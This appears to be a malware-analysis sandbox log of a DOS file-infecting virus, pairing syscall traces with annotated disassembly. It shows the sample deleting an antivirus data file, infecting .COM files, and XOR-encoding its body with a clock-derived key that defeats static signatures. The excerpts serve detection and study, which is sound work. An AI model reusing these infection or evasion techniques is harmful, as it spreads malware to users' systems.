2018-12-25T12:31:24.751590042Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.759582756Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.767760233Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.769732792Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.772879333Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.77559613Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.778982115Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.788085443Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.790883767Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.792742197Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.799871109Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.801297666Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.80980885Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.815059345Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.818446307Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.830674299Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.838555315Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.84614558Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.848758418Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.852822832Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.855648716Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.860115726Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.86933845Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.872798118Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.875582185Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.883405453Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.885522739Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.894562961Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.901193835Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.90465221Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.915856726Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.925015289Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.932545822Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.934571332Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.938598931Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.9413841Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.944767568Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.954649149Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.95792321Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.959813795Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.967727515Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.970189166Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.979049975Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.984579415Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.989023291Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.00021553Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.008012602Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.016943856Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:25.018807833Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:25.021882384Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:25.025467992Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:25.035111994Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.045023475Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.048859117Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.05066704Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.059197952Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.061351575Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.070760596Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.077373556Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.080571712Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.091976923Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.101540499Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.108876544Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:25.111567113Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:25.114959449Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:25.118724631Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:25.123183684Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.132995239Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.136508414Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.139039359Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.146767654Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.14851042Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.157912498Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.163777242Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.167513407Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.179868314Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.18882134Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.192056397Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.194788614Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.203352052Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.209732663Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.212600012Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:25.218526865Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:25.222636469Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:25.235234143Z 59 PC: 1520e | Change current directory
; Clock-gated display routine (excerpt; the code continues past the last line shown).
; The INT 21h call that returns to 0x15212 is logged as "Get time" (op 44 = 2Ch); by DOS
; convention that call returns DH = seconds and DL = hundredths of a second.
; Analysis caveat: the branch below is taken only in about the first 0.06 s of a minute,
; so a dynamic run that does not control the clock will usually not show this path.
2018-12-25T12:31:25.237943518Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5  ; DX <= 5 only when DH (seconds) = 0 and DL (hundredths) <= 5
0x15215: ja 0x15239  ; unsigned compare: every other clock value skips the display
0x15217: mov ax, 0xd  ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]  ; SI -> zero-terminated text; BP is presumably the delta offset (set outside this excerpt)
0x15220: cld  ; string ops count upward
0x15221: lodsb al, byte ptr [si]  ; AL = next character
0x15222: or al, al  ; zero byte ends the text
0x15224: je 0x15230
0x15226: mov ah, 0xe  ; INT 10h teletype output
0x15228: xor bh, bh  ; display page 0
0x1522a: mov bl, 5  ; foreground colour 5
0x1522c: int 0x10
0x1522e: jmp 0x15220  ; next character
0x15230: xor ax, ax  ; AH=00h: block until a key is pressed
0x15232: int 0x16
0x15234: mov ax, 3  ; restore video mode 03h (80x25 text)
0x15237: int 0x10
0x15239: push ax  ; both paths rejoin here; looks like the start of the stacked-AX sequence at 0x15338 — TODO confirm
0x1523a: push bp
2018-12-25T12:31:25.240620702Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:25.242903566Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:25.246179912Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11814,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.821827146Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.82426837Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.827526295Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.833452915Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.841916038Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.848322202Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.858787402Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.869872231Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.877243569Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.882676016Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.888791294Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.901064113Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:23.921830706Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.934021933Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:23.941932578Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:23.943736527Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
; Per-infection XOR encoding of the body before it is appended to the opened file
; (excerpt; the INT 21h that writes the encoded buffer lies past the last line shown).
; The 16-bit key is the DX value returned by the "Get time" call logged on this row, so
; the 752 encoded bytes differ between infected files and make a poor static signature.
; The 21 bytes at [bp+0x105] are written without passing through the XOR loop and end
; exactly where the XOR source begins (0x105 + 0x15 = 0x11a); presumably this is the
; decoder stub and the more stable detection anchor — TODO confirm against the sample.
2018-12-25T12:31:23.946224362Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx  ; save DX (seconds:hundredths) as the key
0x1532e: mov cx, 0x15  ; CX = 21 bytes
0x15331: lea dx, word ptr [bp + 0x105]  ; DS:DX -> the 21-byte block
0x15335: pop ax  ; function number comes off the stack; the push is outside this excerpt
0x15336: int 0x21  ; logged at PC 15338 as a 21-byte write on handle 5
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp  ; temporary frame: [bp+2] is the AX slot just pushed
0x1533c: mov word ptr [bp + 2], 0x4001  ; overwrite the stacked AX with 4001h (AH=40h is DOS write)
0x15341: pop bp  ; BP restored; the patched word stays on the stack for a later pop
0x15342: mov cx, 0x178  ; 0x178 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]  ; DX = key saved above
0x15349: lea si, word ptr [bp + 0x11a]  ; source: the body as it sits in memory
0x1534d: lea di, word ptr [bp + 0x4e2]  ; destination: scratch buffer addressed through ES
0x15351: lodsw ax, word ptr [si]  ; direction flag assumed clear; no cld in this excerpt
0x15352: xor ax, dx  ; one-word XOR with the clock-derived key
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351  ; repeat for all CX words
0x15357: mov cx, 0x2f0  ; 752 bytes, matching the write logged at PC 1536c
0x1535a: lea dx, word ptr [bp + 0x4e2]  ; DS:DX -> encoded copy
2018-12-25T12:31:23.95005392Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:23.952074582Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:23.958109335Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:23.960166474Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:23.964255861Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:23.970917984Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:23.972439419Z 62 PC: 153ab | Close file
2018-12-25T12:31:23.980342772Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:23.985310514Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.988589996Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.992546044Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.002637794Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.010187981Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.017858552Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.019264526Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.02168292Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.025074464Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.027994115Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.033492063Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.036788806Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.038664678Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.04320275Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.045236679Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.050665038Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.053839743Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.056475349Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.062819128Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.07164169Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.080112199Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.081818567Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.084506092Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.087866147Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.091509862Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.099542007Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.102931623Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.104348145Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.1160056Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.118006022Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.125764624Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.130338442Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.133127861Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.143115032Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.150208842Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.156626154Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.159177967Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.160790491Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.162274733Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.164650399Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.169745762Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.171549818Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.173602362Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.1797685Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.181071634Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.18879381Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.193148551Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.195599573Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.2053162Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.212259443Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.218164133Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.219748729Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.222355067Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.224370201Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.227700276Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.235184598Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.237594117Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.239306955Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.245631778Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.247254865Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.255171712Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.259899358Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.262765095Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.273568666Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.280510371Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.286618977Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.288561545Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.290934538Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.293008782Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.30221687Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.309823644Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.312279226Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.313857113Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.320056227Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.321326773Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.329688247Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.334159064Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.336689644Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.347115576Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.353735384Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.359983486Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.362089614Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.364401369Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.366321759Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.36957582Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.377073227Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.379518941Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.380934551Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.387465408Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.388789416Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.39703446Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.401441433Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.403891612Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.415090712Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.421568685Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.427746891Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.429756194Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.436672205Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.441119448Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.444246787Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:24.448241293Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:24.455531612Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:24.465921597Z 59 PC: 1520e | Change current directory
; Clock-gated display routine (excerpt; the code continues past the last line shown).
; The INT 21h call that returns to 0x15212 is logged as "Get time" (op 44 = 2Ch); by DOS
; convention that call returns DH = seconds and DL = hundredths of a second.
; Analysis caveat: the branch below is taken only in about the first 0.06 s of a minute,
; so a dynamic run that does not control the clock will usually not show this path.
2018-12-25T12:31:24.469719106Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5  ; DX <= 5 only when DH (seconds) = 0 and DL (hundredths) <= 5
0x15215: ja 0x15239  ; unsigned compare: every other clock value skips the display
0x15217: mov ax, 0xd  ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]  ; SI -> zero-terminated text; BP is presumably the delta offset (set outside this excerpt)
0x15220: cld  ; string ops count upward
0x15221: lodsb al, byte ptr [si]  ; AL = next character
0x15222: or al, al  ; zero byte ends the text
0x15224: je 0x15230
0x15226: mov ah, 0xe  ; INT 10h teletype output
0x15228: xor bh, bh  ; display page 0
0x1522a: mov bl, 5  ; foreground colour 5
0x1522c: int 0x10
0x1522e: jmp 0x15220  ; next character
0x15230: xor ax, ax  ; AH=00h: block until a key is pressed
0x15232: int 0x16
0x15234: mov ax, 3  ; restore video mode 03h (80x25 text)
0x15237: int 0x10
0x15239: push ax  ; both paths rejoin here; looks like the start of the stacked-AX sequence at 0x15338 — TODO confirm
0x1523a: push bp
2018-12-25T12:31:24.471735006Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:24.473637433Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:24.476203978Z 76 PC: 12a56 | Terminate with return code (Return code = '0')